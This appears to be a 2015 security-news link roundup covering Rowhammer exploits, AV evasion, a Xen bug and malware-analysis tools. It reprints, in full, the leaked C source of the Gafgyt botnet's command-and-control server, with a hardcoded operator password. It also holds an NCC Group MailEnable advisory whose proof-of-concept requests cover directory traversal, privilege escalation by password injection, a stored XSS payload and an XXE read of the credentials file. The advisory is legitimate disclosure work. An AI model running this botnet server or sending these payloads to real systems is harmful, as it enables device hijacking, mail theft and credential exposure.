“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process. When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory.

We don’t know for sure how many machines are vulnerable to this attack, or how many existing vulnerable machines are fixable. Our exploit uses the x86 CLFLUSH instruction to generate many accesses to the underlying DRAM, but other techniques might work on non-x86 systems too.

We expect our PTE-based exploit could be made to work on other operating systems; it is not inherently Linux-specific. Causing bit flips in PTEs is just one avenue of exploitation; other avenues for exploiting bit flips can be practical too. Our other exploit demonstrates this by escaping from the Native Client sandbox.

more here..........http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html


read Cisco's "Mitigations Available for the DRAM Row Hammer Vulnerability" here.......http://blogs.cisco.com/security/mitigations-available-for-the-dram-row-hammer-vulnerability


and Program for testing for the DRAM "rowhammer" problem here........https://github.com/google/rowhammer-test

Found a couple of fun PowerShell enumeration scripts

more here.........http://carnal0wnage.attackresearch.com/2015/03/powershell-ad-recon-by-pyrotek3.html

With the advent of smaller, faster ARM hardware such as the new Raspberry Pi 2 (which now has a Kali image built for it), we’ve been seeing more and more use of these small devices as “throw-away hackboxes“. While this might be a new and novel technology, there’s one major drawback to this concept – and that is the confidentiality of the data stored on the device itself. Most of the setups we’ve seen do little to protect the sensitive information saved on the SD cards of these little computers. This fact, together with a nudge from friends is what prompted us to create a LUKS encrypted, NUKE capable Kali Linux image for our Raspberry Pi devices. The following blog post describes the process, so you can repeat it and make your own shiny shiny.

more here.......https://www.offensive-security.com/kali-linux/raspberry-pi-luks-disk-encryption/

Legacy device drivers implement both device resource management
and isolation. This results in a large code base with
a wide high-level interface making the driver vulnerable to
security attacks. This is particularly problematic for increasingly
popular accelerators like GPUs that have large, complex
drivers. We solve this problem with library drivers, a new
driver architecture. A library driver implements resource management
as an untrusted library in the application process
address space, and implements isolation as a kernel module
that is smaller and has a narrower lower-level interface (i.e.,
closer to hardware) than a legacy driver. We articulate a set
of device and platform hardware properties that are required
to retrofit a legacy driver into a library driver. To demonstrate
the feasibility and superiority of library drivers, we present
Glider, a library driver implementation for two GPUs of popular
brands, Radeon and Intel. Glider reduces the TCB size
and attack surface by about 35% and 84% respectively for a
Radeon HD 6450 GPU and by about 38% and 90% respectively
for an Intel Ivy Bridge GPU. Moreover, it incurs no
performance cost. Indeed, Glider outperforms a legacy driver
for applications requiring intensive interactions with the device
driver, such as applications using the OpenGL immediate
mode API.

The Internet of Things is based on sensors and controls in all sorts of devices. When those types of devices are used to create a smart home, they can give residents unprecedented control and insight. The proliferation of smart devices, however, also opens the door to new dangers and threats.

more here........http://www.macworld.com/article/2894258/how-to-keep-your-connected-home-safe-7-steps-you-can-take-to-boost-home-security.html

Gafgyt server source code leaked reference link here......http://pastebin.com/vdWW47uk
and sample https://www.virustotal.com/sv/file/2a04c216fce75d19e5162081eb747b8a77c205f6dd933b0864c08fb086c929c5/analysis/1425921008/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <time.h>
#include <fcntl.h>
#include <sys/epoll.h>
#include <errno.h>
#include <pthread.h>
#include <signal.h>

// This is what you will connect to through telnet.
// This port is different the the bot port. Which is set when you run the server.
// This is for management and commands interface.
#define MY_MGM_PASS "Cxy0123"
#define MY_MGM_PORT 420

#define MAXFDS 1000000 // No way we actually reach this amount. Ever.

struct clientdata_t {
        uint32_t ip;
        char build[7];
        char connected;
} clients[MAXFDS];
struct telnetdata_t {
        int connected;
} managements[MAXFDS];
static volatile FILE *fileFD;
static volatile int epollFD = 0;
static volatile int listenFD = 0;
static volatile int managesConnected = 0;
int fdgets(unsigned char *buffer, int bufferSize, int fd)
{
        int total = 0, got = 1;
        while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
        return got;
}
void trim(char *str) // Remove whitespace from a string and properly null-terminate it.
{
    int i;
    int begin = 0;
    int end = strlen(str) - 1;
    while (isspace(str[begin])) begin++;
    while ((end >= begin) && isspace(str[end])) end--;
    for (i = begin; i <= end; i++) str[i - begin] = str[i];
    str[i - begin] = '\0';
}


static int make_socket_non_blocking (int sfd)
{ // man fcntl
        int flags, s;
        flags = fcntl (sfd, F_GETFL, 0);
        if (flags == -1)
        {
                perror ("fcntl");
                return -1;
        }
        flags |= O_NONBLOCK;
        /*
              F_SETFL (int)
              Set  the  file  status  flags  to  the  value specified by arg.  File access mode (O_RDONLY, O_WRONLY, O_RDWR) and file creation flags (i.e., O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC) in arg are
              ignored.  On Linux this command can change only the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags.
        */
        s = fcntl (sfd, F_SETFL, flags);
        if (s == -1)
        {
                perror ("fcntl");
                return -1;
        }
        return 0;
}


static int create_and_bind (char *port)
{
        struct addrinfo hints;
        struct addrinfo *result, *rp;
        int s, sfd;
        memset (&hints, 0, sizeof (struct addrinfo));
        hints.ai_family = AF_UNSPEC;     /* Return IPv4 and IPv6 choices */
        hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
        hints.ai_flags = AI_PASSIVE;     /* All interfaces */
        s = getaddrinfo (NULL, port, &hints, &result);
        if (s != 0)
        {
                fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
                return -1;
        }
        for (rp = result; rp != NULL; rp = rp->ai_next)
        {
                sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
                if (sfd == -1) continue;
                int yes = 1;
                if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
                s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
                if (s == 0)
                {
                        break;
                }
                close (sfd);
        }
        if (rp == NULL)
        {
                fprintf (stderr, "Could not bind\n");
                return -1;
        }
        freeaddrinfo (result);
        return sfd;
}
void broadcast(char *msg, int us) // sends message to all bots, notifies the management clients of this happening
{
        int sendMGM = 1;
        if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.
        char *wot = malloc(strlen(msg) + 10);
        memset(wot, 0, strlen(msg) + 10);
        strcpy(wot, msg);
        trim(wot);
        time_t rawtime;
        struct tm * timeinfo;
        time(&rawtime);
        timeinfo = localtime(&rawtime);
        char *timestamp = asctime(timeinfo);
        trim(timestamp);
        int i;
        for(i = 0; i < MAXFDS; i++)
        {
                if(i == us || (!clients[i].connected &&  (sendMGM == 0 || !managements[i].connected))) continue;
                if(sendMGM && managements[i].connected)
                {
                        send(i, "\x1b[33m", 5, MSG_NOSIGNAL);
                        send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
                        send(i, ": ", 2, MSG_NOSIGNAL);
                } //just a prompt with a timestamp.
                printf("sent to fd: %d\n", i); // debug info, possibly also intrusion detection. Tells you when a management client connected on command line.
                send(i, msg, strlen(msg), MSG_NOSIGNAL);
                if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[31m> \x1b[0m", 13, MSG_NOSIGNAL); // send a cool looking prompt to a manager/admin
                else send(i, "\n", 1, MSG_NOSIGNAL);
        }
        free(wot);
}

void *epollEventLoop(void *useless) // the big loop used to control each bot asynchronously. Many threads of this get spawned.
{
        struct epoll_event event;
        struct epoll_event *events;
        int s;
        events = calloc (MAXFDS, sizeof event);
        while (1)
        {
                int n, i;
                n = epoll_wait (epollFD, events, MAXFDS, -1);
                for (i = 0; i < n; i++)
                {
                        if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
                        {
                                clients[events[i].data.fd].connected = 0;
                                close(events[i].data.fd);
                                continue;
                        }
                        else if (listenFD == events[i].data.fd)
                        {
                                while (1)
                                {
                                        struct sockaddr in_addr;
                                        socklen_t in_len;
                                        int infd, ipIndex;

                                        in_len = sizeof in_addr;
                                        infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.
                                        if (infd == -1)
                                        {
                                                if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
                                                else
                                                {
                                                        perror ("accept");
                                                        break;
                                                }
                                        }

                                        clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;

                                        int dup = 0;
                                        for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting
                                        {
                                                if(!clients[ipIndex].connected || ipIndex == infd) continue;

                                                if(clients[ipIndex].ip == clients[infd].ip)
                                                {
                                                        dup = 1;
                                                        break;
                                                }
                                        }

                                        if(dup)
                                        {
                                                printf("Duplicate Client\n"); // warns the operator on command line
                                                if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; } // orders all the bots to immediately kill themselves if we see a duplicate client! MAXIMUM PARANOIA
                                                if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; } // same thing as above.
                                                close(infd);
                                                continue;
                                        }

                                        s = make_socket_non_blocking (infd);
                                        if (s == -1) { close(infd); break; }

                                        event.data.fd = infd;
                                        event.events = EPOLLIN | EPOLLET;
                                        s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
                                        if (s == -1)
                                        {
                                                perror ("epoll_ctl");
                                                close(infd);
                                                break;
                                        }

                                        clients[infd].connected = 1;
                                        //send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
                                }
                                continue;
                        }
                        else
                        {
                                int thefd = events[i].data.fd;
                                struct clientdata_t *client = &(clients[thefd]);
                                int done = 0;
                                client->connected = 1;
                                while (1)
                                {
                                        ssize_t count;
                                        char buf[2048];
                                        memset(buf, 0, sizeof buf);

                                        while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
                                        {
                                                if(strstr(buf, "\n") == NULL) { done = 1; break; }
                                                trim(buf);
                                                if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
                                                {
                                                        if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
                                                        continue;
                                                }
                                                if(strstr(buf, "BUILD ") == buf)
                                                {
                                                        char *build = strstr(buf, "BUILD ") + 6;
                                                        if(strlen(build) > 9) { printf("build bigger then 6\n"); done = 1; break; }
                                                        memset(client->build, 0, 7);
                                                        strcpy(client->build, build);
                                                        continue;
                                                }
                                                if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
                                                {
                                                        char *line = strstr(buf, "REPORT ") + 7;
                                                        fprintf(fileFD, "%s\n", line); // let's write it out to disk without checking what it is!
                                                        fflush(fileFD);
                                                        //TODO: automatically exploit that particular IP after scanning for dir and uploading correct arch stuffs.
                                                        continue;
                                                }
                                                if(strcmp(buf, "PONG") == 0)
                                                {
                                                        //should really add some checking or something but meh
                                                        continue;
                                                }

                                                printf("buf: \"%s\"\n", buf);
                                        }

                                        if (count == -1)
                                        {
                                                if (errno != EAGAIN)
                                                {
                                                        done = 1;
                                                }
                                                break;
                                        }
                                        else if (count == 0)
                                        {
                                                done = 1;
                                                break;
                                        }
                                }

                                if (done)
                                {
                                        client->connected = 0;
                                        close(thefd);
                                }
                        }
                }
        }
}

unsigned int clientsConnected() // counts the number of bots connected by looping over every possible file descriptor and checking if it's connected or not
{
        int i = 0, total = 0;
        for(i = 0; i < MAXFDS; i++)
        {
                if(!clients[i].connected) continue;
                total++;
        }

        return total;
}

void *titleWriter(void *sock) // just an informational banner
{
        // this LOOKS vulnerable, but it's actually not.
        // there's no way we can have 2000 digits' worth of clients/bots connected to overflow that char array
        int thefd = (int)sock;
        char string[2048];
        while(1)
        {
                memset(string, 0, 2048);
                sprintf(string, "%c]0;Hoes connected: %d | Pimps connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
                // \007 is a bell character... causes a beep. Why is there a beep here?
                if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;

                sleep(2);
        }
}


void *telnetWorker(void *sock)
{
        int thefd = (int)sock;
        managesConnected++;
        pthread_t title;
        char buf[2048];
        memset(buf, 0, sizeof buf);

        if(send(thefd, "Password: ", 10, MSG_NOSIGNAL) == -1) goto end; /* failed to send... kill connection  */
        if(fdgets(buf, sizeof buf, thefd) < 1) goto end; /* no data, kill connection */
        trim(buf);
        if(strcmp(buf, MY_MGM_PASS) != 0) goto end; /* bad pass, kill connection */
        memset(buf, 0, 2048);
        if(send(thefd, "\033[1A", 4, MSG_NOSIGNAL) == -1) goto end;
        pthread_create(&title, NULL, &titleWriter, sock); /* writes the informational banner to the admin after a login */
        if(send(thefd, "\x1b[31m*****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*        WELCOME TO THE BALL PIT        *\r\n", 43, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*     Now with \x1b[32mrefrigerator\x1b[31m support     *\r\n", 53, MSG_NOSIGNAL) == -1) goto end;
        if(send(thefd, "*****************************************\r\n\r\n> \x1b[0m", 51, MSG_NOSIGNAL) == -1) goto end;
        /* If we can't send the useless banner, kill ourselves! Amazing error handling! */
        managements[thefd].connected = 1;

        while(fdgets(buf, sizeof buf, thefd) > 0)
        {
                trim(buf);
                if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
                if(strlen(buf) == 0) continue;
                printf("Management: \"%s\"\n", buf);
                broadcast(buf, thefd); // take a command, send it to the bots
                memset(buf, 0, 2048);
        }

        end:    // cleanup dead socket
                managements[thefd].connected = 0;
                close(thefd);
                managesConnected--;
}

void *telnetListener(void *useless)
{
        int sockfd, newsockfd;
        socklen_t clilen;
        struct sockaddr_in serv_addr, cli_addr;
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd < 0) perror("ERROR opening socket");
        bzero((char *) &serv_addr, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = INADDR_ANY;
        serv_addr.sin_port = htons(MY_MGM_PORT);
        if (bind(sockfd, (struct sockaddr *) &serv_addr,  sizeof(serv_addr)) < 0) perror("ERROR on binding");
        listen(sockfd,5);
        clilen = sizeof(cli_addr);
        while(1)
        {
                newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
                if (newsockfd < 0) perror("ERROR on accept");
                pthread_t thread;
                pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
        }
}

int main (int argc, char *argv[])
{
        signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel

        int s, threads;
        struct epoll_event event;

        if (argc != 3)
        {
                fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
                exit (EXIT_FAILURE);
        }
        fileFD = fopen("output.txt", "a+"); // TOCTOU vuln if we have access to CnC
        threads = atoi(argv[2]);

        listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
        if (listenFD == -1) abort ();

        s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
        if (s == -1) abort ();

        s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
        if (s == -1)
        {
                perror ("listen");
                abort ();
        }

        epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
        if (epollFD == -1)
        {
                perror ("epoll_create");
                abort ();
        }

        event.data.fd = listenFD;
        event.events = EPOLLIN | EPOLLET;
        s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
        if (s == -1)
        {
                perror ("epoll_ctl");
                abort ();
        }

        pthread_t thread[threads + 2];
        while(threads--)
        {
                pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
        }

        pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);

        while(1)
        {
                broadcast("PING", -1); // ping bots every 60 sec on the main thread

                sleep(60);
        }

        close (listenFD);

        return EXIT_SUCCESS;
}

XP is a little more complicated than newer systems due to the use of a single driver for both port and miniport; however, getting the original pointers is fairly straight forward depending on how you do it.

During a routine audit of our Website Firewall (WAF), we found a critical vulnerability affecting the popular MainWP Child WordPress plugin. According to worpdress.org, it is installed on more than 90,000 WordPress sites as as remote administration tool. We contacted the MainWP team last week and they patched the vulnerability in version 2.0.9.2 last Friday.

more here.......http://blog.sucuri.net/2015/03/security-advisory-mainwp-child-wordpress-plugin.html

\ \ \_ ___ \\_ ___ \ / _____/______ ____ __ ________
 / | \/ \ \// \ \/ / \ __\_ __ \/ _ \| | \____ \
 / | \ \___\ \____ \ \_\ \ | \( <_> ) | / |_> >
 \____|__ /\______ /\______ / \______ /__| \____/|____/| __/
 \/ \/ \/ \/ |__|
 https://www.nccgroup.com/research/
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title Multiple Vulnerabilities in MailEnable
Release Date 10 March 2015
Reference NCC00777, NCC00778, NCC00779, NCC00780
Discoverer Soroush Dalili (@irsdl)
Vendor MailEnable
Vendor Reference http://www.mailenable.com/
Systems Affected Tested on version 8.56 (versions prior to 8.60, 7.60, 6.88, and 5.62 should
 be vulnerable)
CVE Reference TBC
Risk High
Status Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered 29 December 2014
Reported 03 February 2015
Fixed 26 February 2015
Published 10 March 2015
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Brief Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The following vulnerabilities were identified in the MailEnable application:
1) Directory Traversal
2) Privilege Escalation
3) Stored XSS
4) XXE
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
1) Directory Traversal - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The MailEnable web application was vulnerable to directory traversal without any protections.
Additionally, in some places current directory traversal protection could be bypassed by using
the "/.. /" pattern (a space character after the second dot character) rather than using the
usual "/../" pattern.
As a result it was possible to:
- Share other users' folders to read their messages
- Read other uses' messages
- Upload files in other directories by using directory traversal in the File Upload module
- Delete any files from the server by using the send email functionality
** Example 1: Sharing other users' folders to read their messages
PoC (ID and Folder parameters were affected):
The following request shared another user's INBOX:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=GRANTACCESS&Browser=2&Folder=%2F../anotherUser/Inbox&ME_ACE=EVERYONE&ME_MAILBOX_NAME=&ME_ACCESS=FUL
L&DT=1419288553278
The following request was sent to use this shared folder and enable access to another
user's emails:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=ADDCONNECTION&Browser=2&Mailbox=anotherUser&Folder=%2FInbox&DT=1419289069638
** Example 2: Reading other users' messages
PoC (ID and Folder parameters were affected - "+" sign was used to encode the space
characters):
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=GETMESSAGE&Browser=2&Folder=/X/..+/..+/anotherUser/&ID=./Inbox/DEFAULT.MAI&BODY=0&DT=141929388603
7
** Example 3: Uploading files in other directories by using directory traversal in the File
Upload module
PoC (Folder parameter was affected):
POST
/MEWebMail/Mondo/lang/sys/Forms/FLS/list.aspx?TS=1419286047604&Folder=%24FILEROOT%2f/../../../
../../ HTTP/1.1
Host: example.com
Cookie: [VALID_COOKIES_HERE]
Content-Type: multipart/form-data;
boundary=---------------------------12571835021337
Content-Length: [VALID_LENGTH]
-----------------------------12571835021337
Content-Disposition: form-data; name="__VIEWSTATE"
[VALID_VIEWSTATE_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
[VALID_VIEWSTATEGENERATOR_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="ME_SID"
[VALID_ME_SID_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="uscFileUpload$FileUploader";
filename="testfile.aspx"
Content-Type: application/octet-stream
[data here]
-----------------------------12571835021337--
** Example 4: Deleting arbitrary files from the server by using the send email functionality
PoC (ID and Folder parameters were affected - "+" sign was used to encode the space
characters):
POST /MEWebMail/Mondo/Servlet/request.aspx HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
MailEnable-SessionId: [VALID_SESSIONID_HERE]
Content-Length: [VALID_LENGTH]
Cookie: [VALID_COOKIES_HERE]
Cmd=SENDMESSAGE&ID=xxx\..+\..+\xxxxxxxxx&Folder=%5cDraftsxxxx&MsgBody=test&HTMLFormat=1&FromRecipients
=%5BDEFAULT%5D&ToRecipients=user%40test.com&CCRecipients=&BCCRecipients=&Subject=test&Priority
=3&Notify=false&PostOffice=DEFAULT&Mailbox=testuser&SessionKey=0e7a00032f33230f7c65092c540e690
620&IdentityID=[DEFAULT]&CS=Send
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
2) Privilege Escalation - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
As the username, password, and user-role parameters were stored in a plain-text file
("AUTH.TAB") without any encoding, it was possible to change the user's user-role (or add a
new user) by using a crafted password.
As an example, after changing the password to "Password12%09DEFAULT%09SYSADMIN%09%0A" (by
using a web proxy) in a change password request, the "AUTH.TAB" file was changed as follows
(delimiter was a TAB character):
testuser@DEFAULT 1 Password12 DEFAULT SYSADMIN
DEFAULT USER
Now, "testuser" could log in as an admin user (to reset other users' passwords as an example).
This was possible via the mobile version of the admin section ("/MEAdmin/Mobile/") even when
the admin panel was disabled.
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
3) Stored XSS - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The anti-XSS protection of emails in the MailEnable application was bypassed when an HTML tag
was not closed properly. As a result, it was possible to send an email containing JavaScript
code which would be executed as soon as a victim user viewed the message. An attacker could
set permanent rules for redirecting emails, hijack other emails' contents, share users'
folders, or exploit other vulnerabilities within the MailEnable application to gain admin
access to the application.
PoC ("+" sign was used to encode the space characters):
1337+Message+Body<img/src=x+onerror=alert('XSS-HERE!')+
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
4) XXE - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
There was an XXE vulnerability within the email settings by using the "Options" parameter
which accepted an XML message. As a result, it was possible to read local files or scan the
internal network. As the plain-text email passwords were stored in the "AUTH.TAB" file, it was
possible to read the passwords.
PoC:
The following request was sent to read the first line of the "AUTH.TAB" file
(with Postmaster's password) by using the Background Image URL parameter:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=SET-MBXOPTIONS&Browser=2&Options=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-
1"%3f><!DOCTYPE+options+[+<!ELEMENT+options+ANY+>+<!ENTITY+xxe+SYSTEM+"file%3a///C:\Program+Fi
les\Mail+Enable\Config\AUTH.TAB"+>]><options><option><name><![CDATA[WebMailWatermarkURL]]></name><value>%26xxe;</value></option></options>&DT=1419127432547
After sending this request, the Postmaster's password was in the HTML response
of all the pages as it is shown below:
...
<style type="text/css">
.custBg_img
{background:url(/MEWebMail/Mondo/skins/Pacific/&quot;Postmaster@DEFAULT 1 Password1
DEFAULT ADMIN) no-repeat;background-position:left bottom;background-repeat:no-repeat;}
.custBg_opacity {opacity:0.2;filter:Alpha(opacity=20);-msfilter:"Alpha(Opacity=20)";}
</style>
...
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Upgrade to the latest version. Fixed versions are as follows:
Version 8.60 (the current version)
Version 7.60
Version 6.88
Version 5.62
Release notes are as follows:
http://www.mailenable.com/Standard-ReleaseNotes.txt
http://www.mailenable.com/Professional-ReleaseNotes.txt
http://www.mailenable.com/Enterprise-ReleaseNotes.txt
http://www.mailenable.com/Premium-ReleaseNotes.txt
https://www.mailenable.com/Premium-ReleaseNotes5.txt
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research https://www.nccgroup.com/research
Twitter https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source https://github.com/nccgroup
Blog https://www.nccgroup.com/en/blog/cyber-security/
SlideShare http://www.slideshare.net/NCC_Group/

RESEARCHERS WORKING with the Central Intelligence Agency have conducted a multi-year, sustained effort to break the security of Apple’s iPhones and iPads, according to top-secret documents obtained by The Intercept.

The security researchers presented their latest tactics and achievements at a secret annual gathering, called the “Jamboree,” where attendees discussed strategies for exploiting security flaws in household and commercial electronics. The conferences have spanned nearly a decade, with the first CIA-sponsored meeting taking place a year before the first iPhone was released.

more here........https://firstlook.org/theintercept/2015/03/10/ispy-cia-campaign-steal-apples-secrets/

With technology, we are constantly looking to improve security. We moved from HTTP to HTTPS to help secure online transactions and mitigate man-in-the-middle attacks. With DNS, we have started to implement DNSSEC. Why are we not looking backward at the cornerstone of modern communication, the device that still ties everyone together? The telephone.

There have been minor updates to user experience but there are definitely security enhancements that need to be made. Today, we have auto-dialers claiming to be companies we know and trust, like a Canadian airline WestJet. These scammers mask their true number with spoofed caller ID, which makes them impossible to block. We can improve the end user telephone experience by looking at the basics of computer security and implementing a Triple-A approach to telephone security: authentication, authorization, and accounting.

more here.........http://www.tripwire.com/state-of-security/security-awareness/a-triple-a-approach-to-telephone-security/

Warning: The site contains live malware. Use at your own risk here.........http://oc.gtisc.gatech.edu:8080/


and also another malware analysis engine and repository here....https://avcaesar.malware.lu/

I just wrapped up the Offensive Security Cracking The Perimeter (CTP) course and one of the topics was AV evasion. Although I write a lot of custom scripts and tools, when it comes to AV evasion, I typically rely on the tools and methods of others (Veil, powershell, python, custom shellcode). That said, the great thing about courses like CTP is they give me an excuse to investigate a topic that I haven’t had an opportunity to delve into in much detail.

The CTP course was developed several years ago and I was curious how far AV vendors have come since then; so, after completing the course module, I decided to delve a bit further and devised a little experiment to see how easy it would be to consistently bypass detection of some of the market leading AV products. I spent a weekend tapping out some code and what resulted was a simple proof-of-concept python script I dubbed “peCloak” which automates the process of hiding a malicious windows executable from AV detection (a copy of the beta version is available at the end of this post).

more here.........http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/

In my last blog post, I gave an overview about recent vulnerabilities discovered in the x86 emulation layer of Xen. While both of the discussed vulnerabilities only allow for guest privilege escalation, the complexity of the involved code seemed to indicate that even more interesting bugs could be discovered. So I spent some time searching for memory corruption issues and discovered a very interesting bug that resulted in XSA 123 . This post gives an overview about the root cause of the bug and a short description of exploitation challenges. A follow-up post will describe possible exploitation strategies in more detail.

more here........http://www.insinuator.net/2015/03/xen-xsa-123/

Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben allows you to not only run malware similar to a sandbox, but to also log system-wide events while you manually run malware in ways particular to making it run. For example, it can listen as you run malware that requires varying command line options. Or, watch the system as you step through malware in a debugger.


more here......https://github.com/Rurik/Noriben

Today Oracle released MySQL 5.7.6 milestone 16. With this, MySQL 5.7 has been in development for over 2 years.
